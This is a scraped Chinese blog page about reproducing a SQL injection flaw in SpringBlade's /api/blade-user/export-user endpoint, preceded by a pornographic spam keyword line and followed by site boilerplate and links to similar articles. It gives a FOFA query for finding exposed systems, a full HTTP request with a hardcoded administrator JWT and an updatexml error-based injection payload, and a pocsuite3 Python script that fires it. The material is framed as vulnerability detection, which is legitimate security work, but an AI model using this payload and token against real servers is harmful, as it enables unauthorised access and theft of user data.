国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

漏洞復(fù)現(xiàn)-SpringBlade export-user SQL 注入漏洞(附漏洞檢測腳本)

這篇具有很好參考價值的文章主要介紹了漏洞復(fù)現(xiàn)-SpringBlade export-user SQL 注入漏洞(附漏洞檢測腳本)。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

免責(zé)聲明

文章中涉及的漏洞均已修復(fù),敏感信息均已做打碼處理,文章僅做經(jīng)驗分享用途,切勿當(dāng)真,未授權(quán)的攻擊屬于非法行為!文章中敏感信息均已做多層打馬處理。傳播、利用本文章所提供的信息而造成的任何直接或者間接的后果及損失,均由使用者本人負(fù)責(zé),作者不為此承擔(dān)任何責(zé)任,一旦造成后果請自行負(fù)責(zé)

漏洞描述

該系統(tǒng)/api/blade-user/export-user接口存在SQL注入漏洞,會造成數(shù)據(jù)泄露。

漏洞復(fù)現(xiàn)-SpringBlade export-user SQL 注入漏洞(附漏洞檢測腳本),安全,web安全

fofa語句

body="https://bladex.vip"

poc加檢測

GET /api/blade-user/export-user?Blade-Auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.UHWWVEc6oi6Z6_AC5_WcRrKS9fB3aYH7XZxL9_xH-yIoUNeBrFoylXjGEwRY3Dv7GJeFnl5ppu8eOS3YYFqdeQ&account&realName&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1

漏洞復(fù)現(xiàn)-SpringBlade export-user SQL 注入漏洞(附漏洞檢測腳本),安全,web安全

poc腳本

腳本使用的pocsuite框架

# _*_ coding:utf-8 _*_
# @Time : 2024/1/21
# @Author: 煉金術(shù)師諸葛亮
from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD, random_str

class springboot_apiblade_sql(POCBase):
    pocDesc = '''SpringBlade export-user SQL 注入漏洞'''
    author = '煉金術(shù)師諸葛亮'
    createDate = '2024-1-21'
    name = 'SpringBlade export-user SQL 注入漏洞'


    def _verify(self):

        result = {}
        url = self.url+ '/api/blade-user/export-user?Blade-Auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.UHWWVEc6oi6Z6_AC5_WcRrKS9fB3aYH7XZxL9_xH-yIoUNeBrFoylXjGEwRY3Dv7GJeFnl5ppu8eOS3YYFqdeQ&account&realName&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1'



        try:


            response = requests.get(url)
            if response.status_code == 200 and '6cfe798ba8e5b85feb50164c59f4bec' in response.text:
                result['VerifyInfo'] = {}


            return self.parse_output(result)
        except Exception as e:
            pass

register_poc(springboot_apiblade_sql)

腳本利用

漏洞復(fù)現(xiàn)-SpringBlade export-user SQL 注入漏洞(附漏洞檢測腳本),安全,web安全文章來源地址http://www.zghlxwxcb.cn/news/detail-814774.html

到了這里,關(guān)于漏洞復(fù)現(xiàn)-SpringBlade export-user SQL 注入漏洞(附漏洞檢測腳本)的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進(jìn)行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費用

相關(guān)文章

  • SQL注入漏洞復(fù)現(xiàn):探索不同類型的注入攻擊方法

    這篇文章旨在用于網(wǎng)絡(luò)安全學(xué)習(xí),請勿進(jìn)行任何非法行為,否則后果自負(fù)。? 準(zhǔn)備環(huán)境 sqlilabs靶場 安裝:Sqli-labs靶場搭建(適合新手小白圍觀)_sqlilabs靶場搭建-CSDN博客 ? 注入講解 介紹 ????????基于錯誤的注入(Error-based Injection)是一種 利用應(yīng)用程序返回的錯誤信息來

    2024年02月11日
    瀏覽(26)
  • 用友時空 KSOA 多處SQL注入漏洞復(fù)現(xiàn)

    用友時空 KSOA 多處SQL注入漏洞復(fù)現(xiàn)

    用友時空 KSOA 是建立在 SOA 理念指導(dǎo)下研發(fā)的新一代產(chǎn)品,是根據(jù)流通企業(yè)前沿的 IT 需求推出的統(tǒng)一的IT基礎(chǔ)架構(gòu),它可以讓流通企業(yè)各個時期建立的 IT 系統(tǒng)之間彼此輕松對話。 用友時空 KSOA 系統(tǒng) PayBill、QueryService、linkadd.jsp等接口處存在 sql 注入漏洞,攻擊者可通過這些漏洞

    2024年02月04日
    瀏覽(23)
  • 友點CMS GetSpecial SQL注入漏洞復(fù)現(xiàn)

    友點CMS GetSpecial SQL注入漏洞復(fù)現(xiàn)

    友點CMS是一款高效且靈活的網(wǎng)站管理系統(tǒng),它為用戶提供了簡單易用的界面和豐富的功能。無論是企業(yè)還是個人,都能通過友點CMS快速搭建出專業(yè)且美觀的網(wǎng)站。該系統(tǒng)支持多種內(nèi)容類型和自定義模板,方便用戶按需調(diào)整。同時,它具備強(qiáng)大的SEO功能,能提升網(wǎng)站在搜索引擎

    2024年02月20日
    瀏覽(86)
  • 漏洞復(fù)現(xiàn)-金和OA GetAttOut接口SQL注入漏洞(附漏洞檢測腳本)

    漏洞復(fù)現(xiàn)-金和OA GetAttOut接口SQL注入漏洞(附漏洞檢測腳本)

    文章中涉及的漏洞均已修復(fù),敏感信息均已做打碼處理,文章僅做經(jīng)驗分享用途,切勿當(dāng)真,未授權(quán)的攻擊屬于非法行為!文章中敏感信息均已做多層打馬處理。傳播、利用本文章所提供的信息而造成的任何直接或者間接的后果及損失,均由使用者本人負(fù)責(zé),作者不為此承擔(dān)

    2024年01月16日
    瀏覽(92)
  • Django SQL注入漏洞復(fù)現(xiàn) (CVE-2022-28347)

    ? 在Django 2.2 的 2.2.28 之前版本、3.2 的 3.2.13 之前版本和 4.0 的 4.0.4 之前版本中的 QuerySet.deexplain() 中發(fā)現(xiàn)了SQL注入問題。這是通過傳遞一個精心編制的字典(帶有字典擴(kuò)展)作為**options參數(shù)來實現(xiàn)的,并將注入負(fù)載放置在選項名稱中。 2.2 = Django 2.2.28 3.2 = Django 3.2.13 4.0 = Djan

    2024年02月05日
    瀏覽(23)
  • 用友GRP-U8 SQL注入漏洞復(fù)現(xiàn)

    用友GRP-U8 SQL注入漏洞復(fù)現(xiàn)

    ? ? 用友GRP-U8R10行政事業(yè)財務(wù)管理軟件是用友公司專注于國家電子政務(wù)事業(yè),基于云計算技術(shù)所推出的新一代產(chǎn)品,是我國行政事業(yè)財務(wù)領(lǐng)域最專業(yè)的政府財務(wù)管理軟件。 ?用友GRP-U8的bx_historyDataCheck jsp、slbmbygr.jsp等接口存在SQL注入漏洞,由于用友GRP-U8未對用戶的輸入進(jìn)行有

    2024年02月07日
    瀏覽(20)
  • 【復(fù)現(xiàn)】Wuzhi cms后臺sql注入漏洞_53

    目錄 一.概述 二 .漏洞影響 三.漏洞復(fù)現(xiàn) 1. 漏洞一: 四.修復(fù)建議:

    2024年02月19日
    瀏覽(83)
  • 金山終端安全系統(tǒng)V9.0 SQL注入漏洞復(fù)現(xiàn)

    金山終端安全系統(tǒng)V9.0 SQL注入漏洞復(fù)現(xiàn)

    ? ? ?金山終端安全系統(tǒng)是一款為企業(yè)提供終端防護(hù)的安全產(chǎn)品,針對惡意軟件、病毒和外部攻擊提供防范措施,幫助維護(hù)企業(yè)數(shù)據(jù)和網(wǎng)絡(luò)。 ? ? 金山終端安全系統(tǒng)V9.0?/inter/update_software_info_v2.php頁面存在sql注入漏洞,該漏洞是由于金山終端安全系統(tǒng)未對用戶的輸入進(jìn)行有效的

    2024年02月08日
    瀏覽(32)
  • 用友 GRP-U8 存在sql注入漏洞復(fù)現(xiàn)

    用友 GRP-U8 存在sql注入漏洞復(fù)現(xiàn)

    用友 GRP-U8 license_check.jsp 存在sql注入,攻擊者可利用該漏洞執(zhí)行任意SQL語句,如查詢數(shù)據(jù)、下載數(shù)據(jù)、寫入webshell、執(zhí)行系統(tǒng)命令以及繞過登錄限制等。 fofa:app=”用友-GRP-U8” /u8qx/license_check.jsp?kjnd=1’;WAITFOR%20DELAY%20’0:0:3’— 命令:nuclei -t /nuclei-poc/yonyou/用友-GRP-U8+sql.yaml -

    2024年02月08日
    瀏覽(25)
  • 【漏洞復(fù)現(xiàn)】科立訊通信指揮調(diào)度平臺editemedia.php sql注入漏洞

    【漏洞復(fù)現(xiàn)】科立訊通信指揮調(diào)度平臺editemedia.php sql注入漏洞

    在20240318之前的福建科立訊通信指揮調(diào)度平臺中發(fā)現(xiàn)了一個漏洞。該漏洞被歸類為關(guān)鍵級別,影響文件/api/client/editemedia.php的未知部分。通過操縱參數(shù)number/enterprise_uuid可導(dǎo)致SQL注入。攻擊可能會遠(yuǎn)程發(fā)起。 技術(shù)文章僅供參考,任何個人和組織使用網(wǎng)絡(luò)應(yīng)當(dāng)遵守憲法法律,遵守

    2024年03月24日
    瀏覽(24)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包